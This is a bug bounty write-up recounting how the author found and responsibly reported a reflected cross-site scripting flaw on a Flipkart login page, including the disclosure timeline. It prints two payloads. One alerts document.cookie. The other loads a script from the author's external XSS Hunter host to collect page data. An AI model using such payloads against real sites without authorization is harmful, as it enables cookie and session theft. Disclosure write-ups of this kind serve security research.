Hello Everyone….
I hope you all are doing well. This write-up about Flipkart Cross-Site -Scripting Vulnerability.
If you are into InfoSec or dev you guys are already heard about the Cross-Site-Scripting vulnerability. One of the vulnerabilities in OWASP TOP 10. For those who don’t know about XSS, I will give small info.
XSS(cross-site scripting)
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.When I was searching for a bug bounty program I came across the Flipkart bug bounty program. In that program for valid submission, Flipkart will mention the bug bounty hunter name in their Hall of Fame. So I decided to give it a try.
Started hunting on Flipkart…..
After some recon, I found one issue related to the No Rate limit 😍🙌
Fri, 20 Nov 2020- Reported that issue to Flipkart Security team.
Sun, 22 Nov 2020 –Got a response from the team and it’s a Duplicate😥
Disappointed…
Then I decided that if I give 2nd try😎🤏
Again started my hunting journey on Flipkart. This time I started with proper recon steps. So started with subdomain enumeration.so I came across one of the Flipkart domain. It’s a normal login form page.
I tried with SQL injection here, but no result. Then tried with normal XSS payload on a URL parameter. Hey, it works🤓🙌.XSS alert popped up.
payload: Test?”></script><script>alert(document.cookie)</script>
If I reported this issue here, it’s a self- XSS. Some programs will not accept this issue, the impact will be low here. So we need to increase our impact.
The real hunt started from here….. XSS hunter
What is XSS Hunter
XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
So it’s a very good tool for Blind XSS. If XSS is triggered on the client-side, we can see it. So it’s a low impact. If it is triggered in the internal panel or admin dashboard it’s a high impact. We can get their session-id cookie etc. One better feature about XSS hunter is that when a payload is executed on the internal dashboard or any other place, it will give an alert email and on the XSS hunter page, it will create POC for that particular endpoint.
I used one basic XSS hunter payload on the same URL parameter.
Payload: Test”><script src=https://lohigowda.xss.ht></script>
Heyyyy😍…I received an email from XSS hunter and POC got created. Here we can be able to see the triggered ip, URL location, and a screenshot of that page.
So finally, I am done with Bug Hunting. So it’s reporting time. Then I prepared a clean report and submitted it to the Flipkart security team.
Report Timeline:
Thu, 17 Dec 2020 –Reported to Secuirty Team
18 Dec 2020- First response from team
28 Dec 2020- Bug Accepted
5 Jan 2021- Issue fixed
08 Jan 2021- Acknowledged in their Hall of Fame.
Hall Of Fame
Thanks for reading!….Happy Hacking!
Linkedin: Lohith Gowda M
Twitter: lohigowda_in
Portfolio: https://www.lohigowda.in/